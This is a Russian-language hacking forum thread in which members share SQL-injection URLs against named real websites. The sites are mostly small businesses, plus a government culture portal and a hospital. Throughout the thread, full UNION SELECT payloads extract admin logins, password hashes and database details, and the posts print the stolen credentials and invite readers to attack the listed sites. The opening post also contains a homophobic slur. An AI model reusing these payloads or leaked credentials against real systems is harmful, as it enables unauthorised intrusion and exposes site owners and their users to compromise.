terminal-s52

Объявление

Администрация форума не несет никакой ответственности за действия пользователей! Уважаемые пользователи всю информацию и софт вы используете на свой страх и риск! Приятного пребывания на форуме!

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » terminal-s52 » Хакинг » Выкладываем скули!


Выкладываем скули!

Сообщений 1 страница 19 из 19

1

Буду первоНахом!
_http://www.gaycentral.ru/news/?id=30' пи*еров в аут!!!!

Отредактировано Abra-Ca-Tab-Ra (2008-09-03 22:37:29)

0

2

по подробней можна что такое скули

0

3

Скуль, это уязвимость типа My sql-injection с нифильтруемым параметром к примеру _http://www.target.com/index.php?id=1' вот такая уязвимость и есть скуль!

0

4

а нафига их выкладывать?

0

5

как нафига ты же хочешь к примеру взломать сайт?))...чтоб весь нет не рыть в поисках уязвимых сайтах, вот уже найдены будут sql и с них начинаешь ломать.....  :crazy:

0

6

вот решил выложить пару sql сразу скажу что ломал давно работают они, я ненаю :crazy:

http://www.statistica.md/news.php?lang=ru&id=-173+UNION+SELECT+1,2,concat_ws(0x3a,USERNAME,PASSWORD),4,5,6,7,8,9,10,11+FROM+adminusers+LIMIT+1,1/*

login-ana
pass-c0ntr0l

.http://www.aquasystems.md/readarticle.php?id=-3+union+select+1,2,COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x7267625f6d656d62657273+LIMIT+1,1/*

name-OzzZZ
password-29123098

http://bid4tackle.com/category.php?cate_id=-13+union+select+1,concat_ws(0x3a,user_name,password),3,4+FROM+admin/*

admin:$1$p4..8//.$Ent39SQht4YHt/NonxSvs0

Отредактировано gangs (2008-09-16 15:25:55)

+1

7

_http://www.trud.ru/issue/news.php?id=-2493+union+select+1,2,version(),4,5,6,7,8/* так и не смог подобрать таблицы ушел спать
_http://www.ganzara.ru/internet/book%20/media/?id=-999999+UNION+SELECT+1,2,TABLE_NAME,4,5,6,7+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+19,1/*

0

8

_http://www.psychasoc.com/print_news.php?ID=-999999+union+select+login,2,3,4,5+from+admin/*
_http://michaelyoun.com/index.php?id=-335+union+select+1,login,3,4,5,6+from+users/*

Отредактировано seven (2008-09-19 06:09:03)

0

9

http://trubka.net/showmelodie.php?id=4020'
Тут есть. Тока что дальше хз  :dontknow:

0

10

http://www.photocs.info/index.php?link=2&id=17
(прежде чем ломать саму статью прочтите на странице =) )

0

11

гарин написал(а):

http://www.photocs.info/index.php?link=2&id=17 (прежде чем ломать саму статью прочтите на странице =) )

А лучше ломать и не чего не трогать ! Нафиг кульные сайты портить !

0

12

Don't Learn to HACK - HACK to LEARN

0

13

Гарин, http://www.photocs.info/index.php?link= … ,4,version(),6/*
а другое не выводит!

0

14

хз . я в них не шарю. нашел ошибку, дальше я ничего не делал

0

15

seven написал(а):

Don't Learn to HACK - HACK to LEARN

И это тоже верно !

0

16

Вот вам скуль от меня:

Код:
http://wow.cybergame.su/index.php?newsid=-25+union+select+1,2,3,concat_ws(char(58),gmlevel,username,char(58),id,char(58),sha_pass_hash,char(58),sessionkey,char(58),v,char(58),s,char(58),email,char(58),joindate,char(58),last_ip,char(58),failed_logins,char(58),locked,char(58),last_login,char(58),online,char(58),tbc,char(58),mutetime,char(58),%20locale,char(58)),5,6+from+account--

Отредактировано m0rgan (2008-11-07 21:23:35)

0

17

http://rucasino.net/

В форме авторизации
В Логин подставлял ковычку

Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1

0

18

Вот не большой збор скулей от меня:

Код:
http://www.tregu-kosovar.com/inseratedetails.php?id=247'+and+1=1+union+all+select+1,2,3,4,5,concat(username,char(58),passwort),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+az_user/*&refid=&lang=

логин/пасс:

Код:
leaa:21881

------------------------------------------------

Код:
http://www.albanianroyalfamily.com/index.php?faqe=shfaqlajm&lajmid=-9999+union+all+select+1,2,convert(concat_ws(char(58),username,password)+using+utf8),4,null,6,null,8,9+from+login--

логин/пасс:

Код:
admin:mbreti

---------------------------------------------

Код:
http://www.mycybermedia.com/listo_kategori.php?kategorianr=-9999+union+all+select+1,2,3,4,null,concat_ws(char(58),username,password),7,8,9,10,11,12+from+admin--

логин/пасс:

Код:
admin:admin

------------------------------------------

Код:
http://www.albauto.com/rallyalbania/galeri_info.php?ida=26+and+1=2+union+all+select+1,2,3,concat(username,char(58),password),5,6+from+editor/*&page=29

логин/пасс:

Код:
 admin:ee99fafdaf801531af8861addda2603c

--------------------------------------------

Код:
http://www.environment.adanet.com.al/tekst.php?idt=16+and+1=2+union+all+select+1,concat(user,char(58),password),3,4,5,6,7,8,9,10+from+mysql.user/*

логин/пасс:

Код:
root:54c57d3714ca092d

------------------------------------------

Код:
http://www.reutov.net/iss/photo_news/news/newsone.php?id=-394%20union%20select%201,2,3,4,concat_ws(char(58),name,pass),6,7,8,9+from+users+limit+1,1/*

логин/пасс:

Код:
drupal:9536bdcd9e3faa581d6991b5d04ac4ec

-----------------------------------------

Код:
http://www.wonpwn.com/games.php?id=-2'+union+select+1,username,3,user_password,5,6,7,8,9,0,1+from+bb2_users+limit+1,1/*

логин/пасс:

Код:
JimmyDinner:2e4b43e13698dd4df580f90b76b0de2a

----------------------------------------

Код:
http://www.housescreen.be/ugroups.php?UID=1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15+from+signup--

логин/пасс:

Код:
frans:9d0aa885d8b6db599231726fd377f739
Код:
benny:74d39d16ccd8128184800880e529db76
Код:
Eveline:c45817c7a68626d7428e95e3a0dad694
Код:
Dsky:7d91594f16e9674749bc1cf3f91752af
Код:
Bart:008884c57916bb8fd80421cfed45ac38[CODE]
[CODE]test:098f6bcd4621d373cade4e832627b4f6

-------------------------------------------

Код:
http://www.ajaxprojects.com/ajax/viewcategory.php?categoryid=-8+union+select+1,2,concat(username,0x3a,0x3a,password,0x3a,email),4,5,6,7+from+user/*

логин/пасс/мыло:

Код:
ajax::29062006:ajaxteam@gmail.com

----------------------------------------------

Код:
http://www.heimlichinstitute.org/page.php?id=null+UNION+ALL+SELECT+1,convert(concat(user,0x3a,password)+using+latin1),3,4+FROM+mysql.user--

логин/пасс:

Код:
root:*C3F44A16E1B0CA7DABAA9587D64AF55B1C7833C4

-----------------------------------------------

Код:
http://www.donabauer.at/bookmarks//view_group.php?id=-1+union+select+0,1,concat_ws(0x3a,username,password),3,4,5,6,7+FROM+apb_users--

логин/пасс:

Код:
 gast:27wvfetVjvcRo

------------------------------------------------

Код:
http://www.aesouk.com/category.php?cate_id=-2+UNION+SELECT+1,concat_ws(0x3a,user_name,password),3,4+from+admin--

логин/пасс:

Код:
 Categories within admin:$1$p8EHR3eg$brgVoxx0n4udlQ35s2iCo0

-------------------------------------------------

Код:
http://www.schuetzenbund.de/shop/list.php?id=-21%27+union+select+1,concat_ws(char(58),name,password),3,4,5,6,7,8,9+from+user/*

логин/пасс:

Код:
admin:sh00ting

------------------------------------------------

Код:
http://www.solusihukum.com/artikel.php?id=-1+union+select+1,2,concat_ws(0x10,pwd,uid),4,5+from+user/*

логин/пасс:

Код:
jingklong:kong
Код:
agungjuga:agung
Код:
jalil:andy

---------------------------------------------

Код:
http://www.tiranatimes.com/newscat.php?id=5+and+1=1+union+all+select+1,concat(username,char(58),password),3,4,5+from+tt_users/*&cat=5

логин/пасс:

Код:
GEMA:GEMATT

---------------------------------------------
The End!

0

19

АП, вот вам мой севодняшний сбор уязвимостей! Пройдемся по nl.

Код:
http://www.nanoshield.nl/productinfo.php?id=-1+union+all+select+0,1,concat_ws(version(),user(),database()),3,4,5,6,7,8--

версия/юзер/бд:

Код:
faq@blade22.geenpunt.nl5.0.32-Debian_7etch8faq

------------------------------------------------------------------

Код:
http://ictnieuws.educos.nl/detail.php?ID=-1+union+all+select+0,1,concat_ws(version(),user(),database()),3--

версия/юзер/бд:

Код:
educos@www03.ip2.net5.0.51educos

------------------------------------------------------------------

Код:
http://www.jansiebelink.nl/detail.php?id=-1+union+all+select+concat_ws(version(),user(),database())--

версия/юзер/бд:

Код:
haas@10.171.105.65.0.32-Debian_7etch8-logjan

----------------------------------------------------------------

Код:
http://www.nvha.nl/readnews.php?id=-1+union+all+select+0,1,concat_ws(version(),user(),database()),3,4--

версия/юзер/бд:

Код:
5053nvha@10.0.1.615.0.51a-3ubuntu5.15053nvha

-----------------------------------------------------------------

Код:
http://www.art-innovation.nl/event.php?id=-1+union+all+select+concat_ws(version(),user(),database()),1--

версия/юзер/бд:

Код:
artinnovat_main@localhost4.0.23-standard-logartinnovat_main

------------------------------------------------------------------

Код:
http://www.tamaynut.nl/newsdetail.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2,3,4,5,6,7,8,9,10,11--

версия/юзер/бд:

Код:
tamayn32_tamaynu@localhost4.1.22-standardtamayn32_tamaynut

----------------------------------------------------------------

Код:
http://www.trovet.nl/newsdetail.php?id=-1+union+all+select+0,1,2,3,4,concat_ws(version(),user(),database()),6,7--

версия/юзер/бд:

Код:
trovet_user@localhost5.0.27trovet_data

---------------------------------------------------------------

Код:
http://www.26000gezichten.nl/news.php?id=-1+union+all+select+0,1,concat_ws(version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13--

версия/юзер/бд:

Код:
26000gezichten@localhost4.0.24_Debian-10sarge2-log26000gezichten

--------------------------------------------------------------

Код:
http://www.zeelandwoning.nl/pages.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2--

версия/юзер/бд:

Код:
zeelandwon_joom@localhost5.0.51a-community-logzeelandwon_joom

---------------------------------------------------------------

Код:
http://www.opdesloep.nl/pages.php?id=-1+union+all+select+0,1,2,convert(concat_ws(version(),user(),database())+using+latin1),4,5--

версия/юзер/бд:

Код:
sitesuntrack@localhost4.1.12-standard-logsuntrack

----------------------------------------------------------------------

Добавлено через 1 час 18 минут
Продолжение славного дела:)

Код:
http://www.danishdesignwatches.eu/prod_detail.php?id=-1+union+all+select+0,1,2,3,4,5,6,concat_ws(version(),user(),database()),8,9,10,11,12,13,14,15,16,17--

версия/юзер/бд:

Код:
26872admin@10.0.5.615.0.51a-3ubuntu5.126872admin

----------------------------------------------------------

Код:
http://www.granietbeurs.nl/website.php?id=-1+union+all+select+convert(concat_ws(version(),user(),database())+using+latin1)--

версия/юзер/бд:

Код:
dagranietb_gran@localhost4.1.12-standard-logdagranietb_gran

----------------------------------------------------------

Код:
http://www.spsrasd.info/fr/detail.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2,3,4,5,6,7--

версия/юзер/бд:

Код:
spsrasd@localhost5.0.58cms

---------------------------------------------------------

Код:
http://www.digitaccess.fr/category.php?id=-1+union+all+select+0,1,2,concat_ws(version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15--

версия/юзер/бд:

Код:
digit93@localhost5.0.27digitaccess

--------------------------------------------------------

Код:
http://www.cmgolf.fr/product.php?id=-1+union+all+select+0,1,2,concat_ws(version(),user(),database()),4,5,6,7,8,9--

версия/юзер/бд:

Код:
my67521@62.193.203.2265.0.32-Debian_7etch6-logmy67521

-------------------------------------------------------

Код:
http://www.serema.fr/produit.php?id=-1+union+all+select+0,1,convert(concat_ws(version(),user(),database())+using+latin1),3,4,5,6--

версия/юзер/бд:

смотрим в свойствах картинки:)

Код:
serema@localhost4.1.10aserema_fr

--------------------------------------------------

Код:
http://www.eliotrope.fr/theme.php?id=-1+union+all+select+0,concat_ws(version(),user(),database())--

версия/юзер/бд:

Код:
elio_trope@localhost5.0.32-Debian_7etch8-logeliotrope_base

---------------------------------------------------------

Код:
http://www.fetedelamusique.culture.fr/page.php?id=-1+union+all+select+0,1,2,concat_ws(version(),user(),database()),4,5,6,7--

версия/юзер/бд:

Код:
musique@euterpe.culture.fr5.0.45-Max-logmusique

--------------------------------------------------------

Код:
http://design-facade.fr/readnews.php?id=-1+union+all+select+0,1,concat_ws(version(),user(),database()),3,4,5,6,7--

версия/юзер/бд:

Код:
designfa@10.0.75.124.0.25-standard-logdesignfa

--------------------------------------------------------

Код:
http://www.cshm-schm.ca/fr/event.php?id=-1+union+all+select+0,1,concat_ws(version(),user(),database()),3,4--

версия/юзер/бд:

Код:
cshm@localhost5.0.27cshm

Думаю на первое время вам хватит:)
-----------------------------------------------------
The End!

Добавлено через 6 часов 11 минут
Вот небольной сбор багов на конец дня:)
Налетай:)

Код:
http://www.v-p-c.fr/article.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2,3--

юзер/версия/бд:

Код:
vpc@10.0.70.104.0.25-standard-logvpc :

-------------------------------------------------------------

Код:
http://www.fpt-soft.com/FR/newsDetail.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2,3,4,5,6,7,8--

юзер/версия/бд:

Код:
fpt_soft_com@localhost4.1.19-logdb_fpt_soft_com

------------------------------------------------------------

по сути тот же проект, только с другим доменным именем:)

Код:
http://www.fsoft.com.vn/FR/newsDetail.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2,3,4,5,6,7,8--

юзер/версия/бд:

Код:
fpt_soft_com@localhost4.1.19-logdb_fpt_soft_com

-------------------------------------------------------------

Код:
http://www.scenarts.fr/fiche_spectacle.php?id=-1+union+all+select+0,1,concat_ws(version(),user(),database()),3,4--

юзер/версия/бд:

Код:
logscenarts-scenarts@10.0.75.615.0.68

-------------------------------------------------------------

Код:
http://www.rdsm.be/fr/news.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2,3--

юзер/версия/бд:

Код:
reyskensp@192.168.0.165.0.77-0.dotdeb.0reyskensp

----------------------------------------------------------------

Код:
http://www.mielapiculteur.fr/faq2.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2,3,4,5,6,7,8,9,10--

юзер/версия/бд:

Код:
lunedemiel@localhost4.0.18mielapi

-----------------------------------------------------------------

Код:
http://www.sitetic.fr/prod_detail.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2,3,4,5,6,7,8,9,10--

юзер/версия/бд:

Код:
sitetic-web@localhost4.1.22sitetic

----------------------------------------------------------------
The End!

Добавлено через 45 часов 33 минуты
Вот сново небольшой сбор скулей от меня :)
На этот раз пройдемся по доменной зоне co.uk!

www.solutionfocusedtrainers.co.uk

PR:2

Код:
http://www.solutionfocusedtrainers.co.uk/trainers.php?id=-1+union+all+select+0,concat_ws(version(),user(),database()),2,3,4,5,6--

Юзер/версия/бд:

Код:
dbo197803277@212.227.114.1364.0.27-max-logdb197803277

------------------------------------------------------------------

www.mynhw.co.uk

PR:4

Код:
http://www.mynhw.co.uk/news-full.php?id=-1+union+all+select+0,1,concat_ws(version(),user(),database()),3,4,5,6,7,8,9--

Юзер/версия/бд:

Код:
sniasuper@server213-171-218-159.livedns.org.uk5.0.45SNIA

----------------------------------------------------------------

www.ccsrecruitment.co.uk

PR:1

Код:
http://www.ccsrecruitment.co.uk/newsdetail.php?id=-1+union+all+select+0,1,2,3,4,5,6,concat_ws(version(),user(),database()),8,9--

Юзер/версия/бд:

Код:
logccsunix_jobs-ccsunix_rishi@web7.myhsphere.cc5.0.67

----------------------------------------------------------------

www.judgement-productions.co.uk

PR:4

Код:
http://www.judgement-productions.co.uk/show.php?id=-1+union+all+select+0,1,2,concat_ws(version(),user(),database())--

Юзер/версия/бд:

Код:
judgement1@213.171.218.1375.0.22-logjudgement1

------------------------------------------------------------

www.c8imc.co.uk

PR:1

Код:
http://www.c8imc.co.uk/news.php?id=-1+union+all+select+0,1,concat_ws(version(),user(),database()),3,4,5--

Юзер/версия/бд:

Код:
mainimc@localhost4.1.19-standard-logmainimc

---------------------------------------------------------

www.positivestepstraining.co.uk

PR:2

Код:
http://www.positivestepstraining.co.uk/website.php?id=-1+union+all+select+0,1,2,3,4,5,6,7,8,9,10,concat_ws(version(),user(),database())--

Юзер/версия/бд:

Код:
evolvenetroottwo@server213-171-192-98.livedns.org.uk5.0.45evolvenetmainsqltwo

---------------------------------------------------------------------

Вот самый интерестный!!!!11111

www.vogueescorts.co.uk

PR:1

Код:
http://www.vogueescorts.co.uk/main.php?id=-255+union+select+1,2,3--

Ну вот как обычно небольшой сбор :)
Налетай :)

Код:
http://www.apslaquila.it/event.php?id=-1+union+all+select+0,concat_ws(0x3a,version(),user(),database()),2--

версия/юзер/бд:

Код:
5.0.22:apslaquila@localhost:apslaquila

-----------------------------------------------------------------------

Код:
http://www.motortribe.it/news_view.php?ID=-1+union+all+select+0,1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15--

версия/юзер/бд:

Код:
5.0.22:mt_user@lnx6653:I-DEAS_motortribe

--------------------------------------------------------------------

Код:
http://www.alessandrastocchino.it/gallery.php?id=-1+union+all+select+0,concat_ws(0x3a,version(),user(),database())--

версия/юзер/бд:

Код:
log:Sql85634@62.149.141.41:Sql85634_1

------------------------------------------------------------------

Код:
http://www.gurtenapotheke.ch/product.php?id=-1+union+all+select+concat_ws(0x3a,version(),user(),database()),1--

версия/юзер/бд:

Код:
4.1.25:gurtenap@localhost:gurtenap_data

-------------------------------------------------------------------

Код:
http://www.codexflores.ch/event.php?id=-1+union+all+select+0,1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7--

версия/юзер/бд:

Код:
5.0.45:root@localhost:codexflores

----------------------------------------------------------------------

Код:
http://www.marchanzeiger.ch/newsdetail.php?id=-1+union+all+select+0,1,concat_ws(0x3a,version(),user(),database()),3,4,5--

версия/юзер/бд:

Код:
4.0.24_Debian-10sarge1:marchanzeiger@localhost:marchanzeiger  3

---------------------------------------------------------------------

Код:
http://www.klassiker-garage.ch/show.php?ID=-1+union+all+select+0,concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8--

версия/юзер/бд:

Код:
4.1.22-standard:web373@localhost:usr_web373_1

-------------------------------------------------------------------

Код:
http://www.spitalzollikerberg.ch/download.php?id=-1+union+all+select+0,1,2,3,4,concat_ws(0x3a,version(),user(),database())--

версия/юзер/бд:

Код:
5.0.32-Debian_7etch8:root@localhost:cms24

---------------------------------------------------------------------

Код:
http://www.palatina.ch/gallery.php?id=-1+union+all+select+0,concat_ws(0x3a,version(),user(),database()),2,3--

версия/юзер/бд:

Код:
4.1.18-standard:dabumpimpa_pa@localhost:dabumpimpa_palatina

------------------------------------------------------------------

Код:
http://www.theofficepub.at/event.php?id=-1+union+all+select+0,1,concat_ws(0x3a,version(),user(),database()),3,4,5--

версия/юзер/бд:

Код:
5.0.77-1-log:jist@localhost:jistTheOfficePub

---------------------------------------------------------------------
The End!

Отредактировано bug1z (2009-03-05 15:51:20)

0

Похожие темы


Вы здесь » terminal-s52 » Хакинг » Выкладываем скули!